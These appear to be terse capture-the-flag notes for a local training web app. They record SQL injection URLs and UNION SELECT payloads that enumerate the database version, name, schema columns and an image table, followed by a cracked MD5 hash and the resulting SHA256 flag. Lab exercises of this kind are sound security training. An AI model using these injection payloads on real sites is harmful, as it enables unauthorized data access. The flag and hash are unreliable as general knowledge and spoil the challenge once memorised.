http://localhost:8042/index.php?page=searchimg&id=1+UNION+SELECT+1%2C+version%28%29+limit+1%2C1&Submit=Submit#
1 UNION SELECT 1, version() limit 1,1

1 UNION SELECT 1, database() 

database: Member_images

http://localhost:8042/index.php?page=searchimg&id=1+UNION+SELECT+table_name%2C+column_name+FROM+information_schema.columns&Submit=Submit#
1 UNION SELECT table_name, column_name FROM information_schema.columns



http://localhost:8042/index.php?page=searchimg&id=1+UNION+SELECT+url,%20comment%20+FROM%20list_images&Submit=Submit#

Title: If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46



1928e8083cf461a51303633093573c46 --> albatroz

SHA256: F2A29020EF3132E01DD61DF97FD33EC8D7FCD1388CC9601E7DB691D17D4D6188